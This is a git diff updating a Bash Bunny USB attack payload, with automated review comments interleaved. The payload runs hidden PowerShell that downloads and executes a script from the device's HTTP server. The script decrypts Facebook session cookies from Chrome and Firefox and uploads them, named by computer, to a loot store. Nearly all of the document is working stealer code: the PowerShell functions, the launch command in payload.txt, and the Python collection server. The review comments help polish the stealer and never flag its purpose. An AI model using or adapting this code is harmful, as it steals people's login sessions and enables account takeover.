diff --git a/payloads/library/WindowsCookies/README.md b/payloads/library/WindowsCookies/README.md old mode 100644 new mode 100755 index c5ff331b..23d6c05a --- a/payloads/library/WindowsCookies/README.md +++ b/payloads/library/WindowsCookies/README.md @@ -1,13 +1,13 @@ # WindowsCookies for Bash Bunnys Author: oXis -Version: Version 2.0 +Version: Version 2.1 Credit: illwill, sekirkity, EmpireProject ## Description Based on BrowserCreds from illwill, this version grabs Facebook session cookies from Chrome/Firefox on Windows, decrypt them and put them in /root/udisk/loot/FacebookSession -Only works for Chrome/Firefox on Windows. Tested on two different Windows 10 machines. +Only works for Chrome/Firefox on Windows. Tested on two different Windows 10 machines, now works on Windows 7 (fixed powershell regex) Only payload.txt, server.py and p are required. Server.py will load a local HTTP server, the script is downloaded from that server and then uploads the cookies to it. @@ -16,6 +16,6 @@ Server.py will load a local HTTP server, the script is downloaded from that serv | LED | Status | | ---------------- | -------------------------------------- | | Blue (blinking) | Payload init | -| White (blinking) | Setup RNDIS_ETHERNET | +| Yellow (blinking)| Setup RNDIS_ETHERNET | | Green (blinking) | Done | diff --git a/payloads/library/WindowsCookies/get_facebook_cookies.ps1 b/payloads/library/WindowsCookies/get_facebook_cookies.ps1 old mode 100644 new mode 100755 index b3eabccc..09038dc6 --- a/payloads/library/WindowsCookies/get_facebook_cookies.ps1 +++ b/payloads/library/WindowsCookies/get_facebook_cookies.ps1 
@@ -1,118 +1,124 @@
-# Instructions: import the module, then perform the commanded needed.
-
-# Chrome Facebook cookies extraction
-# Use: Get-FacebookCreds [path to Login Data]
-# Path is optional, use if automatic search doesn't work
-
-function Get-FacebookCreds-Firefox() {
- Param(
- [String]$Path
- )
-
- if ([String]::IsNullOrEmpty($Path)) {
- # $Path = "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Cookies"
- $path = Get-ChildItem "$env:USERPROFILE\AppData\Roaming\Mozilla\Firefox\Profiles\*.default\cookies.sqlite"
- }
-
- if (![system.io.file]::Exists($Path))
- {
- Write-Error 'Chrome db file doesnt exist, or invalid file path specified.'
- Break
- }
-
- Add-Type -AssemblyName System.Security
- # Credit to Matt Graber for his technique on using regular expressions to search for binary data
- $Stream = New-Object IO.FileStream -ArgumentList "$Path", 'Open', 'Read', 'ReadWrite'
- $Encoding = [system.Text.Encoding]::GetEncoding(28591)
- $StreamReader = New-Object IO.StreamReader -ArgumentList $Stream, $Encoding
- $BinaryText = $StreamReader.ReadToEnd()
- $StreamReader.Close()
- $Stream.Close()
-
- # First the magic bytes for the facebook string, datr size is 24
- $PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x64\x61\x74\x72([\s\S]{24})'
- $PwdMatches = $PwdRegex.Matches($BinaryText)
- $datr = $PwdMatches.groups[1]
-
- # First the magic bytes for the facebook string, c_user size is 15
- $PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x63\x5F\x75\x73\x65\x72([\s\S]{15})'
- $PwdMatches = $PwdRegex.Matches($BinaryText)
- $c_user = $PwdMatches.groups[1]
-
- # First the magic bytes for the facebook string, xs size is 44
- $PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x78\x73([\s\S]{44})'
- $PwdMatches = $PwdRegex.Matches($BinaryText)
- $xs = $PwdMatches.groups[1]
-
- "$env:computername ---> "
- "datr is $datr ###"
- "c_user is $c_user ###"
- "xs is $xs ###"
-}
-
-function Get-FacebookCreds-Chrome() {
- Param(
- [String]$Path
- )
-
- if ([String]::IsNullOrEmpty($Path)) {
- $Path = "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Cookies"
- }
-
- if (![system.io.file]::Exists($Path))
- {
- Write-Error 'Chrome db file doesnt exist, or invalid file path specified.'
- Break
- }
-
- Add-Type -AssemblyName System.Security
- # Credit to Matt Graber for his technique on using regular expressions to search for binary data
- $Stream = New-Object IO.FileStream -ArgumentList "$Path", 'Open', 'Read', 'ReadWrite'
- $Encoding = [system.Text.Encoding]::GetEncoding(28591)
- $StreamReader = New-Object IO.StreamReader -ArgumentList $Stream, $Encoding
- $BinaryText = $StreamReader.ReadToEnd()
- $StreamReader.Close()
- $Stream.Close()
-
- # First the magic bytes for the facebook string, datr size is 242 + 4 and hex is \x64\x61\x74\x72
- $PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x64\x61\x74\x72)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{242})'
- $PwdMatches = $PwdRegex.Matches($BinaryText)
-
- # [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2]));
- $Pwd = $Encoding.GetBytes($PwdMatches.groups[2])
- $Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser)
- $datr = [System.Text.Encoding]::Default.GetString($Decrypt)
-
-
- # First the magic bytes for the facebook string, c_user size is 226 + 4 and hex is \x63\x5F\x75\x73\x65\x72
- $PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x63\x5F\x75\x73\x65\x72)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{226})'
- $PwdMatches = $PwdRegex.Matches($BinaryText)
-
- # [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2]));
- $Pwd = $Encoding.GetBytes($PwdMatches.groups[2])
- $Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser)
- $c_user = [System.Text.Encoding]::Default.GetString($Decrypt)
-
-
- # First the magic bytes for the facebook string, xs size is 258 + 4 and hex is \x78\x73
- $PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x78\x73)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{258})'
- $PwdMatches = $PwdRegex.Matches($BinaryText)
-
- # [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2]));
- $Pwd = $Encoding.GetBytes($PwdMatches.groups[2])
- $Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser)
- $xs = [System.Text.Encoding]::Default.GetString($Decrypt)
-
- "$env:computername ---> "
- "datr is $datr ###"
- "c_user is $c_user ###"
- "xs is $xs ###"
-}
-
-
-function Payload() {
-
- Invoke-Expression (New-Object Net.WebClient).UploadString('http://172.16.64.1:8080/l', $(Get-FacebookCreds-Chrome))
- Invoke-Expression (New-Object Net.WebClient).UploadString('http://172.16.64.1:8080/l', $(Get-FacebookCreds-Firefox))
-
-}
+# Instructions: import the module, then perform the commanded needed.
+
+# Chrome Facebook cookies extraction
+# Use: Get-FacebookCreds [path to Login Data]
+# Path is optional, use if automatic search doesn't work
+
+function Get-FacebookCreds-Firefox() {
+ Param(
+ [String]$Path
+ )
+
+ if ([String]::IsNullOrEmpty($Path)) {
+ # $Path = "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Cookies"
+ $path = Get-ChildItem "$env:USERPROFILE\AppData\Roaming\Mozilla\Firefox\Profiles\*.default\cookies.sqlite"
+ }
+
+ if (![system.io.file]::Exists($Path))
+ {
+ Write-Error 'Chrome db file doesnt exist, or invalid file path specified.'
+ Break
+ }
+
+ Add-Type -AssemblyName System.Security
+ # Credit to Matt Graber for his technique on using regular expressions to search for binary data
+ $Stream = New-Object IO.FileStream -ArgumentList "$Path", 'Open', 'Read', 'ReadWrite'
+ $Encoding = [system.Text.Encoding]::GetEncoding(28591)
+ $StreamReader = New-Object IO.StreamReader -ArgumentList $Stream, $Encoding
+ $BinaryText = $StreamReader.ReadToEnd()
+ $StreamReader.Close()
+ $Stream.Close()
+
+ # First the magic bytes for the facebook string, datr size is 24
+ $PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x64\x61\x74\x72([\s\S]{24})'
+ $PwdMatches = $PwdRegex.Matches($BinaryText)
+ $datr = $PwdMatches | ForEach-Object { $_.Groups[1].Value }
+ # $datr = $PwdMatches.groups[1]
+
+ # First the magic bytes for the facebook string, c_user size is 15
+ $PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x63\x5F\x75\x73\x65\x72([\s\S]{15})'
+ $PwdMatches = $PwdRegex.Matches($BinaryText)
+ $c_user = $PwdMatches | ForEach-Object { $_.Groups[1].Value }
+ # $c_user = $PwdMatches.groups[1]
+
+ # First the magic bytes for the facebook string, xs size is 44
+ $PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x78\x73([\s\S]{44})'
+ $PwdMatches = $PwdRegex.Matches($BinaryText)
+ $xs = $PwdMatches | ForEach-Object { $_.Groups[1].Value }
+ # $xs = $PwdMatches.groups[1]
+
+ "Firefox ---> "
+ "datr is $datr ###"
+ "c_user is $c_user ###"
+ "xs is $xs ###"
+}
+
+function Get-FacebookCreds-Chrome() {
+ Param(
+ [String]$Path
+ )
+
+ if ([String]::IsNullOrEmpty($Path)) {
+ $Path = "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Cookies"
+ }
+
+ if (![system.io.file]::Exists($Path))
+ {
+ Write-Error 'Chrome db file doesnt exist, or invalid file path specified.'
+ Break
+ }
+
+ Add-Type -AssemblyName System.Security
+ # Credit to Matt Graber for his technique on using regular expressions to search for binary data
+ $Stream = New-Object IO.FileStream -ArgumentList "$Path", 'Open', 'Read', 'ReadWrite'
+ $Encoding = [system.Text.Encoding]::GetEncoding(28591)
+ $StreamReader = New-Object IO.StreamReader -ArgumentList $Stream, $Encoding
+ $BinaryText = $StreamReader.ReadToEnd()
+ $StreamReader.Close()
+ $Stream.Close()
+
+ # First the magic bytes for the facebook string, datr size is 242 + 4 and hex is \x64\x61\x74\x72
+ $PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x64\x61\x74\x72)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{242})'
+ $PwdMatches = $PwdRegex.Matches($BinaryText)
+
+ # [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2]));
+ $Pwd = $Encoding.GetBytes(($PwdMatches | ForEach-Object { $_.Groups[2].Value }))
+ # $Pwd = $Encoding.GetBytes($PwdMatches.groups[2])
+ $Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser)
+ $datr = [System.Text.Encoding]::Default.GetString($Decrypt)
+
+
+ # First the magic bytes for the facebook string, c_user size is 226 + 4 and hex is \x63\x5F\x75\x73\x65\x72
+ $PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x63\x5F\x75\x73\x65\x72)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{226})'
+ $PwdMatches = $PwdRegex.Matches($BinaryText)
+
+ # [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2]));
+ $Pwd = $Encoding.GetBytes(($PwdMatches | ForEach-Object { $_.Groups[2].Value }))
+ # $Pwd = $Encoding.GetBytes($PwdMatches.groups[2])
+ $Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser)
+ $c_user = [System.Text.Encoding]::Default.GetString($Decrypt)
+
+
+ # First the magic bytes for the facebook string, xs size is 258 + 4 and hex is \x78\x73
+ $PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x78\x73)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{258})'
+ $PwdMatches = $PwdRegex.Matches($BinaryText)
+
+ # [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2]));
+ $Pwd = $Encoding.GetBytes(($PwdMatches | ForEach-Object { $_.Groups[2].Value }))
+ # $Pwd = $Encoding.GetBytes($PwdMatches.groups[2])
+ $Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser)
+ $xs = [System.Text.Encoding]::Default.GetString($Decrypt)
+
+ "Chrome ---> "
+ "datr is $datr ###"
+ "c_user is $c_user ###"
+ "xs is $xs ###"
+}
+
+
+function Payload() {
+
+ Invoke-Expression (New-Object Net.WebClient).UploadString("http://172.16.64.1:8080/$env:computername", $(Get-FacebookCreds-Chrome))
+ Invoke-Expression (New-Object Net.WebClient).UploadString("http://172.16.64.1:8080/$env:computername", $(Get-FacebookCreds-Firefox))
+
+}
\ No newline at end of file
diff --git a/payloads/library/WindowsCookies/p b/payloads/library/WindowsCookies/p
old mode 100644
new mode 100755
index b3eabccc..09038dc6
--- a/payloads/library/WindowsCookies/p
+++ b/payloads/library/WindowsCookies/p
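Review bot: The new `get_facebook_cookies.ps1` is byte-identical to `p` (both file headers carry the same blob ids `b3eabccc..09038dc6`), so every edit in this commit had to be made twice and the two copies will drift the next time only one is touched; keep a single source file. Within this hunk, the Firefox function still emits `Write-Error 'Chrome db file doesnt exist, or invalid file path specified.'` although it has just looked for `cookies.sqlite` — the message should name Firefox. The header comment `# Use: Get-FacebookCreds [path to Login Data]` also no longer matches either of the two function names defined below it and should list `Get-FacebookCreds-Chrome` and `Get-FacebookCreds-Firefox` with their `-Path` parameter.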
@@ -1,118 +1,124 @@
-# Instructions: import the module, then perform the commanded needed.
-
-# Chrome Facebook cookies extraction
-# Use: Get-FacebookCreds [path to Login Data]
-# Path is optional, use if automatic search doesn't work
-
-function Get-FacebookCreds-Firefox() {
- Param(
- [String]$Path
- )
-
- if ([String]::IsNullOrEmpty($Path)) {
- # $Path = "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Cookies"
- $path = Get-ChildItem "$env:USERPROFILE\AppData\Roaming\Mozilla\Firefox\Profiles\*.default\cookies.sqlite"
- }
-
- if (![system.io.file]::Exists($Path))
- {
- Write-Error 'Chrome db file doesnt exist, or invalid file path specified.'
- Break
- }
-
- Add-Type -AssemblyName System.Security
- # Credit to Matt Graber for his technique on using regular expressions to search for binary data
- $Stream = New-Object IO.FileStream -ArgumentList "$Path", 'Open', 'Read', 'ReadWrite'
- $Encoding = [system.Text.Encoding]::GetEncoding(28591)
- $StreamReader = New-Object IO.StreamReader -ArgumentList $Stream, $Encoding
- $BinaryText = $StreamReader.ReadToEnd()
- $StreamReader.Close()
- $Stream.Close()
-
- # First the magic bytes for the facebook string, datr size is 24
- $PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x64\x61\x74\x72([\s\S]{24})'
- $PwdMatches = $PwdRegex.Matches($BinaryText)
- $datr = $PwdMatches.groups[1]
-
- # First the magic bytes for the facebook string, c_user size is 15
- $PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x63\x5F\x75\x73\x65\x72([\s\S]{15})'
- $PwdMatches = $PwdRegex.Matches($BinaryText)
- $c_user = $PwdMatches.groups[1]
-
- # First the magic bytes for the facebook string, xs size is 44
- $PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x78\x73([\s\S]{44})'
- $PwdMatches = $PwdRegex.Matches($BinaryText)
- $xs = $PwdMatches.groups[1]
-
- "$env:computername ---> "
- "datr is $datr ###"
- "c_user is $c_user ###"
- "xs is $xs ###"
-}
-
-function Get-FacebookCreds-Chrome() {
- Param(
- [String]$Path
- )
-
- if ([String]::IsNullOrEmpty($Path)) {
- $Path = "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Cookies"
- }
-
- if (![system.io.file]::Exists($Path))
- {
- Write-Error 'Chrome db file doesnt exist, or invalid file path specified.'
- Break
- }
-
- Add-Type -AssemblyName System.Security
- # Credit to Matt Graber for his technique on using regular expressions to search for binary data
- $Stream = New-Object IO.FileStream -ArgumentList "$Path", 'Open', 'Read', 'ReadWrite'
- $Encoding = [system.Text.Encoding]::GetEncoding(28591)
- $StreamReader = New-Object IO.StreamReader -ArgumentList $Stream, $Encoding
- $BinaryText = $StreamReader.ReadToEnd()
- $StreamReader.Close()
- $Stream.Close()
-
- # First the magic bytes for the facebook string, datr size is 242 + 4 and hex is \x64\x61\x74\x72
- $PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x64\x61\x74\x72)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{242})'
- $PwdMatches = $PwdRegex.Matches($BinaryText)
-
- # [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2]));
- $Pwd = $Encoding.GetBytes($PwdMatches.groups[2])
- $Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser)
- $datr = [System.Text.Encoding]::Default.GetString($Decrypt)
-
-
- # First the magic bytes for the facebook string, c_user size is 226 + 4 and hex is \x63\x5F\x75\x73\x65\x72
- $PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x63\x5F\x75\x73\x65\x72)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{226})'
- $PwdMatches = $PwdRegex.Matches($BinaryText)
-
- # [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2]));
- $Pwd = $Encoding.GetBytes($PwdMatches.groups[2])
- $Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser)
- $c_user = [System.Text.Encoding]::Default.GetString($Decrypt)
-
-
- # First the magic bytes for the facebook string, xs size is 258 + 4 and hex is \x78\x73
- $PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x78\x73)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{258})'
- $PwdMatches = $PwdRegex.Matches($BinaryText)
-
- # [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2]));
- $Pwd = $Encoding.GetBytes($PwdMatches.groups[2])
- $Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser)
- $xs = [System.Text.Encoding]::Default.GetString($Decrypt)
-
- "$env:computername ---> "
- "datr is $datr ###"
- "c_user is $c_user ###"
- "xs is $xs ###"
-}
-
-
-function Payload() {
-
- Invoke-Expression (New-Object Net.WebClient).UploadString('http://172.16.64.1:8080/l', $(Get-FacebookCreds-Chrome))
- Invoke-Expression (New-Object Net.WebClient).UploadString('http://172.16.64.1:8080/l', $(Get-FacebookCreds-Firefox))
-
-}
+# Instructions: import the module, then perform the commanded needed.
+
+# Chrome Facebook cookies extraction
+# Use: Get-FacebookCreds [path to Login Data]
+# Path is optional, use if automatic search doesn't work
+
+function Get-FacebookCreds-Firefox() {
+ Param(
+ [String]$Path
+ )
+
+ if ([String]::IsNullOrEmpty($Path)) {
+ # $Path = "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Cookies"
+ $path = Get-ChildItem "$env:USERPROFILE\AppData\Roaming\Mozilla\Firefox\Profiles\*.default\cookies.sqlite"
+ }
+
+ if (![system.io.file]::Exists($Path))
+ {
+ Write-Error 'Chrome db file doesnt exist, or invalid file path specified.'
+ Break
+ }
+
+ Add-Type -AssemblyName System.Security
+ # Credit to Matt Graber for his technique on using regular expressions to search for binary data
+ $Stream = New-Object IO.FileStream -ArgumentList "$Path", 'Open', 'Read', 'ReadWrite'
+ $Encoding = [system.Text.Encoding]::GetEncoding(28591)
+ $StreamReader = New-Object IO.StreamReader -ArgumentList $Stream, $Encoding
+ $BinaryText = $StreamReader.ReadToEnd()
+ $StreamReader.Close()
+ $Stream.Close()
+
+ # First the magic bytes for the facebook string, datr size is 24
+ $PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x64\x61\x74\x72([\s\S]{24})'
+ $PwdMatches = $PwdRegex.Matches($BinaryText)
+ $datr = $PwdMatches | ForEach-Object { $_.Groups[1].Value }
+ # $datr = $PwdMatches.groups[1]
+
+ # First the magic bytes for the facebook string, c_user size is 15
+ $PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x63\x5F\x75\x73\x65\x72([\s\S]{15})'
+ $PwdMatches = $PwdRegex.Matches($BinaryText)
+ $c_user = $PwdMatches | ForEach-Object { $_.Groups[1].Value }
+ # $c_user = $PwdMatches.groups[1]
+
+ # First the magic bytes for the facebook string, xs size is 44
+ $PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x78\x73([\s\S]{44})'
+ $PwdMatches = $PwdRegex.Matches($BinaryText)
+ $xs = $PwdMatches | ForEach-Object { $_.Groups[1].Value }
+ # $xs = $PwdMatches.groups[1]
+
+ "Firefox ---> "
+ "datr is $datr ###"
+ "c_user is $c_user ###"
+ "xs is $xs ###"
+}
+
+function Get-FacebookCreds-Chrome() {
+ Param(
+ [String]$Path
+ )
+
+ if ([String]::IsNullOrEmpty($Path)) {
+ $Path = "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Cookies"
+ }
+
+ if (![system.io.file]::Exists($Path))
+ {
+ Write-Error 'Chrome db file doesnt exist, or invalid file path specified.'
+ Break
+ }
+
+ Add-Type -AssemblyName System.Security
+ # Credit to Matt Graber for his technique on using regular expressions to search for binary data
+ $Stream = New-Object IO.FileStream -ArgumentList "$Path", 'Open', 'Read', 'ReadWrite'
+ $Encoding = [system.Text.Encoding]::GetEncoding(28591)
+ $StreamReader = New-Object IO.StreamReader -ArgumentList $Stream, $Encoding
+ $BinaryText = $StreamReader.ReadToEnd()
+ $StreamReader.Close()
+ $Stream.Close()
+
+ # First the magic bytes for the facebook string, datr size is 242 + 4 and hex is \x64\x61\x74\x72
+ $PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x64\x61\x74\x72)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{242})'
+ $PwdMatches = $PwdRegex.Matches($BinaryText)
+
+ # [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2]));
+ $Pwd = $Encoding.GetBytes(($PwdMatches | ForEach-Object { $_.Groups[2].Value }))
+ # $Pwd = $Encoding.GetBytes($PwdMatches.groups[2])
+ $Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser)
+ $datr = [System.Text.Encoding]::Default.GetString($Decrypt)
+
+
+ # First the magic bytes for the facebook string, c_user size is 226 + 4 and hex is \x63\x5F\x75\x73\x65\x72
+ $PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x63\x5F\x75\x73\x65\x72)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{226})'
+ $PwdMatches = $PwdRegex.Matches($BinaryText)
+
+ # [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2]));
+ $Pwd = $Encoding.GetBytes(($PwdMatches | ForEach-Object { $_.Groups[2].Value }))
+ # $Pwd = $Encoding.GetBytes($PwdMatches.groups[2])
+ $Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser)
+ $c_user = [System.Text.Encoding]::Default.GetString($Decrypt)
+
+
+ # First the magic bytes for the facebook string, xs size is 258 + 4 and hex is \x78\x73
+ $PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x78\x73)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{258})'
+ $PwdMatches = $PwdRegex.Matches($BinaryText)
+
+ # [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2]));
+ $Pwd = $Encoding.GetBytes(($PwdMatches | ForEach-Object { $_.Groups[2].Value }))
+ # $Pwd = $Encoding.GetBytes($PwdMatches.groups[2])
+ $Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser)
+ $xs = [System.Text.Encoding]::Default.GetString($Decrypt)
+
+ "Chrome ---> "
+ "datr is $datr ###"
+ "c_user is $c_user ###"
+ "xs is $xs ###"
+}
+
+
+function Payload() {
+
+ Invoke-Expression (New-Object Net.WebClient).UploadString("http://172.16.64.1:8080/$env:computername", $(Get-FacebookCreds-Chrome))
+ Invoke-Expression (New-Object Net.WebClient).UploadString("http://172.16.64.1:8080/$env:computername", $(Get-FacebookCreds-Firefox))
+
+}
\ No newline at end of file
diff --git a/payloads/library/WindowsCookies/payload.txt b/payloads/library/WindowsCookies/payload.txt
old mode 100644
new mode 100755
index 085416a9..5bff8645
--- a/payloads/library/WindowsCookies/payload.txt
+++ b/payloads/library/WindowsCookies/payload.txt
@@ -2,34 +2,31 @@ # # Title: Facebook session cookies dump # Author: oXis (inspired by illwill) -# Version: 2.0 +# Version: 2.1 # -# Dumps the stored session cookies from Chrome browser by downloading a Powershell script -# then stashes them in /root/udisk/loot/FacebookSession/l -# Credits to these guys for their powershell scripts: -# https://github.com/sekirkity/BrowserGather BrowserGather.ps1 -# https://github.com/EmpireProject/Empire Get-FoxDump.ps1 -# Also credit to illwill for the BrowerCreds payload +# Dumps the stored session cookies from Chrome/Firefox browser by downloading a Powershell script +# then stashes them in /root/udisk/loot/FacebookSession/COMPUTER_NAME +# Credit to illwill for the BrowerCreds payload # # LED States # Setup.............Setup -# Blue..............Running Script -# White.............Setup RNDIS_ETHERNET +# Yellow............Setup RNDIS_ETHERNET # Green.............Got Browser Creds - LED SETUP LOOTDIR=/root/udisk/loot/FacebookSession mkdir -p $LOOTDIR + ATTACKMODE HID LED STAGE1 GET SWITCH_POSITION cd /root/udisk/payloads/$SWITCH_POSITION/ +# server.py can now instant bind sockets +iptables -A OUTPUT -p udp --dport 53 -j DROP ./server.py & -sleep 1 #Dump Chrome Cookies -RUN WIN "powershell -WindowStyle Hidden \"while(\$true){If(Test-Connection 172.16.64.1 -count 1 -quiet){sleep 2;IEX (New-Object Net.WebClient).DownloadString('http://172.16.64.1:8080/p'); Payload; exit}}\"" +RUN WIN "powershell -WindowStyle Hidden while(\$true){If(Test-Connection 172.16.64.1 -count 1 -quiet){sleep 2;IEX (New-Object Net.WebClient).DownloadString('http://172.16.64.1:8080/p'); Payload; exit}}" LED STAGE2 ATTACKMODE RNDIS_ETHERNET diff --git a/payloads/library/WindowsCookies/server.py b/payloads/library/WindowsCookies/server.py old mode 100644 new mode 100755 index 977bb6d9..46246872 --- a/payloads/library/WindowsCookies/server.py +++ b/payloads/library/WindowsCookies/server.py 
@@ -3,10 +3,9 @@ from os import curdir from os.path import join as pjoin from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer -# from http.server import BaseHTTPRequestHandler, HTTPServer class StoreHandler(BaseHTTPRequestHandler): - store_path = pjoin("/root/udisk/loot/FacebookSession/", 'l') + store_path = "/root/udisk/loot/FacebookSession" get_path = pjoin(curdir, 'p') def do_GET(self): @@ -18,16 +17,14 @@ class StoreHandler(BaseHTTPRequestHandler): self.wfile.write(fh.read().encode()) def do_POST(self): - if self.path == '/l': - length = self.headers['content-length'] - data = self.rfile.read(int(length)) + length = self.headers['content-length'] + data = self.rfile.read(int(length)) - with open(self.store_path, 'a') as fh: - fh.write(data.decode() + "\n") + with open(self.store_path + self.path, 'a') as fh: + fh.write(data.decode() + "\n") - self.send_response(200) + self.send_response(200) server = HTTPServer(('', 8080), StoreHandler) server.serve_forever() -
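Review bot: `with open(self.store_path + self.path, 'a')` in the second hunk's do_POST now writes to a file named entirely by the request: the `if self.path == '/l'` check that bounded it was removed and nothing rejects `..` segments or additional `/` components, so a request can open a file outside `/root/udisk/loot/FacebookSession`, and a path naming a missing subdirectory raises inside the handler instead of being answered with an error status. Reduce it to one filename inside the directory — `name = basename(self.path.strip('/'))`, refuse an empty `name` or `..` with a 400, then `open(pjoin(self.store_path, name), 'a')` — `pjoin` is already imported and `basename` would come from the same `os.path` import shown at the top of the first hunk. `length = self.headers['content-length']` is likewise read unconditionally now, so a POST without that header fails in the handler; guard it before `int(length)`. The `self.send_response(200)` at the end is still not followed by `self.end_headers()`, which the replaced lines also lacked, so the response is never terminated properly.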